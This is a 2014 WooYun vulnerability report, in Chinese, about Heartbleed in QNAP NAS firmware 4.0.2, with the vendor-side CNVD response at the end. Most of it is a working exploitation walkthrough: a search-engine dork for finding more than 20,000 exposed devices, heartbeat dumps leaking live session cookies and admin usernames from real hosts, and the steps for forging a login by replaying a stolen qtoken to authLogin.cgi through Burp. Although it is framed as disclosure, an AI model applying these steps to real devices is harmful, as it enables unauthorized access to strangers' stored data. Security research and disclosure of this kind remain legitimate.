当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067896

漏洞标题:某知名nas设备存在heartbleed(附利用技巧)

相关厂商:CNCERT

漏洞作者: if、so

提交时间:2014-07-09 16:04

修复时间:2014-10-07 16:06

公开时间:2014-10-07 16:06

漏洞类型:默认配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-09: 细节已通知厂商并且等待厂商处理中
2014-07-14: 厂商已经确认,细节仅向厂商公开
2014-07-17: 细节向第三方安全合作伙伴开放
2014-09-07: 细节向核心白帽子及相关领域专家公开
2014-09-17: 细节向普通白帽子公开
2014-09-27: 细节向实习白帽子公开
2014-10-07: 细节向公众公开

简要描述:

某知名nas设备存在heartbleed,附利用技巧

详细说明:

威联通科技股份有限公司(QNAP Systems, Inc.),是极少数以商用服务器获得世界认同的台湾跨国企业,旗下的NAS产品线在欧美市场的销售量已经居于领导性地位,成为华人于欧美市场成功开创自有品牌的典范。公司专注于提供专业级的NAS网络储存装置、NVR安全监控解决方案及NMP网络多媒体播放器。
旗下的QNAP NAS turbo 4.0.2版本存在heartbleed,(只知道这个版本)
Google hack:

inurl:inurl:cgi-bin/QTS.cgi?count=


搜索出来了2w多结果

1111.JPG


从第一个开始测试

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 1208
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  [email protected][...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 0D 0A 44 7B  ....#.........D{
  00e0: EF 2F C7 08 29 7B 47 32 40 89 CF 03 9F 56 4C CC  ./..){[email protected].
  00f0: 6D 4D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D  mM..............
  0100: 01 00 02 00 03 00 0F 00 10 00 11 00 23 00 00 00  ............#...


Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 1208
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  [email protected][...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 2C CD 2E 7B  ....#.......,..{
  00e0: EB 35 1F AD A9 F5 15 B5 33 5F A9 9E 14 6E C5 A4  .5......3_...n..
  00f0: F0 73 55 0C E8 E6 9A 6E A2 A1 D3 13 83 1F 11 73  .sU....n.......s
  0100: 4D 05 FD 51 6A 1E 41 67 65 6E 74 3A 20 4D 6F 7A  M..Qj.Agent: Moz
  0110: 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D 70 61 74  illa/5.0 (compat
  0120: 69 62 6C 65 3B 20 47 6F 6F 67 6C 65 62 6F 74 2F  ible; Googlebot/
  0130: 32 2E 31 3B 20 2B 68 74 74 70 3A 2F 2F 77 77 77  2.1; +http://www
  0140: 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 62 6F 74 2E  .google.com/bot.
  0150: 68 74 6D 6C 29 0D 0A 0D 0A 06 AE F6 5B BD 4B E8  html).......[.K.
  0160: 26 A2 3A 47 10 1F A3 E6 10 2A 9D 51 0C 74 2E 68  &.:G.....*.Q.t.h
  0170: 74 6D 6C 29 0D 0A 0D 0A BE CD EE 1B 91 85 9D 77  tml)...........w
  0180: 9E 76 98 5C C9 FE 16 0A 33 C3 AF 2A 00 00 00 00  .v.\....3..*....


... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 1208
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  [email protected][...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 4D B3 0E 3C  ....#.......M..<
  00e0: AE 89 EE 2A 87 46 76 2B BB 75 3C 29 94 53 EA 95  ...*.Fv+.u<).S..
  00f0: BB 45 5C E3 15 FB F9 42 2B 97 33 C8 BB 1C B0 5D  .E\....B+.3....]
  0100: 95 D7 0A 15 5F FB 43 6F 6E 6E 65 63 74 69 6F 6E  ...._.Connection
  0110: 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 0D 0A  : keep-alive....
  0120: 55 BF AC D3 9E 14 10 FB D7 0F 19 F6 64 B4 15 B6  U...........d...
  0130: 8F AC 23 9E 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B  ..#.............
  0140: 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28  t: Mozilla/5.0 (
  0150: 63 6F 6D 70 61 74 69 62 6C 65 3B 20 47 6F 6F 67  compatible; Goog
  0160: 6C 65 62 6F 74 2F 32 2E 31 3B 20 2B 68 74 74 70  lebot/2.1; +http
  0170: 3A 2F 2F 77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F  ://www.google.co
  0180: 6D 2F 62 6F 74 2E 68 74 6D 6C 29 0D 0A 41 63 63  m/bot.html)..Acc
  0190: 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A  ept-Encoding: gz
  01a0: 69 70 2C 64 65 66 6C 61 74 65 0D 0A 0D 0A 26 72  ip,deflate....&r
  01b0: 3D 30 2E 32 38 36 36 34 32 39 32 34 34 31 36 38  =0.2866429244168
  01c0: 31 30 33 F1 BD 91 9B 20 BD 71 05 89 21 2C D5 61  103.... .q..!,.a


Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 1208
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  [email protected][...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 32 30 31 33  ....#.......2013
  00e0: 30 37 32 36 0D 0A 41 63 63 65 70 74 2D 4C 61 6E  0726..Accept-Lan
  00f0: 67 75 61 67 65 3A 20 7A 68 2D 54 57 0D 0A 41 63  guage: zh-TW..Ac
  0100: 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67  cept-Encoding: g
  0110: 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D 0A 55 73  zip, deflate..Us
  0120: 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C  er-Agent: Mozill
  0130: 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C  a/4.0 (compatibl
  0140: 65 3B 20 4D 53 49 45 20 37 2E 30 3B 20 57 69 6E  e; MSIE 7.0; Win
  0150: 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57  dows NT 6.1; WOW
  0160: 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B  64; Trident/7.0;
  0170: 20 53 4C 43 43 32 3B 20 2E 4E 45 54 20 43 4C 52   SLCC2; .NET CLR
  0180: 20 32 2E 30 2E 35 30 37 32 37 3B 20 2E 4E 45 54   2.0.50727; .NET
  0190: 20 43 4C 52 20 33 2E 35 2E 33 30 37 32 39 3B 20   CLR 3.5.30729; 
  01a0: 2E 4E 45 54 20 43 4C 52 20 33 2E 30 2E 33 30 37  .NET CLR 3.0.307
  01b0: 32 39 3B 20 4D 65 64 69 61 20 43 65 6E 74 65 72  29; Media Center
  01c0: 20 50 43 20 36 2E 30 3B 20 2E 4E 45 54 34 2E 30   PC 6.0; .NET4.0
  01d0: 43 3B 20 49 6E 66 6F 50 61 74 68 2E 33 3B 20 2E  C; InfoPath.3; .
  01e0: 4E 45 54 20 43 4C 52 20 31 2E 31 2E 34 33 32 32  NET CLR 1.1.4322
  01f0: 3B 20 2E 4E 45 54 34 2E 30 45 29 0D 0A 48 6F 73  ; .NET4.0E)..Hos
  0200: 74 3A 20 6E 61 73 2D 66 74 70 0D 0A 43 6F 6E 74  t: nas-ftp..Cont
  0210: 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 36 30 0D 0A  ent-Length: 60..
  0220: 44 4E 54 3A 20 31 0D 0A 43 6F 6E 6E 65 63 74 69  DNT: 1..Connecti
  0230: 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A  on: Keep-Alive..
  0240: 43 61 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6E  Cache-Control: n
  0250: 6F 2D 63 61 63 68 65 0D 0A 43 6F 6F 6B 69 65 3A  o-cache..Cookie:
  0260: 20 44 45 53 4B 54 4F 50 3D 31 3B 20 6E 61 73 5F   DESKTOP=1; nas_
  0270: 77 66 6D 5F 74 72 65 65 5F 78 3D 32 30 30 3B 20  wfm_tree_x=200; 
  0280: 6E 61 73 5F 32 5F 73 3D 6A 33 34 37 62 76 69 32  nas_2_s=j347bvi2
  0290: 3B 20 57 49 4E 44 4F 57 5F 4D 4F 44 45 3D 31 3B  ; WINDOW_MODE=1;
  02a0: 20 6E 61 73 5F 6C 61 6E 67 3D 45 4E 47 3B 20 73   nas_lang=ENG; s
  02b0: 6B 69 70 5F 49 45 5F 64 65 74 65 63 74 3D 31 3B  kip_IE_detect=1;
  02c0: 20 50 48 50 53 45 53 53 49 44 3D 37 38 36 35 63   PHPSESSID=7865c
  02d0: 65 63 66 39 65 63 63 37 39 63 36 39 66 32 39 30  ecf9ecc79c69f290
  02e0: 30 30 63 65 33 35 38 66 34 33 33 3B 20 4E 41 53  00ce358f433; NAS
  02f0: 5F 55 53 45 52 3D 61 64 6D 69 6E 3B 20 68 6F 6D  _USER=admin; hom
  0300: 65 3D 31 3B 20 4E 41 53 5F 53 49 44 3D 6A 33 34  e=1; NAS_SID=j34
  0310: 37 62 76 69 32 3B 20 73 68 6F 77 51 75 69 63 6B  7bvi2; showQuick
  0320: 53 74 61 72 74 3D 31 3B 20 51 54 3D 31 34 30 34  Start=1; QT=1404
  0330: 38 38 31 37 34 31 38 33 30 0D 0A 0D 0A C9 5F 06  881741830....._.
  0340: 2B FB 50 B6 9F B8 A6 1B C2 48 D0 AC 35 8F C8 1F  +.P......H..5...
  0350: F8 B0 9E F6 D4 55 0D 0B 03 17 31 96 7D 02 02 02  .....U....1.}...


第一页随便就测出了5,6个,至于其他没测试出,说明防火墙屏蔽了443端口,毕竟有些机器是内网映射出来的。
利用:现成的cookie是无法登入的,利用花了好多时间才搞定。

1111.JPG


当多尝试几次抓取到cookie数据时,这里指的完整数据,是带有token的,这是关键,然后找到nas_1_u,后面是base64编码,解出来就是用户名,有时候会直接有nas_user参数,我这个cookie里面没有。当知道用户名和token就可以伪造正常登陆nas系统了。

_2014-07-09T07-35-25.562Z.png


首先随便输入信息,抓个包

POST /cgi-bin/authLogin.cgi HTTP/1.1
Host: xxx:8080
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxx/cgi-bin/login.html?4.0.3.20130912
Content-Length: 52
Cookie: DESKTOP=1; PHPSESSID=6ce5874ada5f49475b4d3363e1009b7d
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
user=123&serviceKey=1&pwd=MTIz&&r=0.6503833241116638


然后替换用户名,并且加上token

user=Mediaxxx&serviceKey=1&remme=1&qtoken=8e0398b48e33b12d2431a2994b25161d


然后burp一直forward,然后就登陆进去了

_2014-07-09T07-41-50.023Z.png

漏洞证明:

_2014-07-09T07-41-50.023Z.png

修复方案:

版权声明:转载请注明来源 if、so@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-07-14 10:28

厂商回复:

在此前的Openssl漏洞中,CNVD已经完成测试。参见此前的CNVD微博公告。同时感谢白帽子的特征提取工作,CNVD已经收录该特征。目前,由于未直接建立软件生产厂商联系渠道,待进一步处置。按通用软件衍生漏洞评分,ran k12

最新状态:

暂无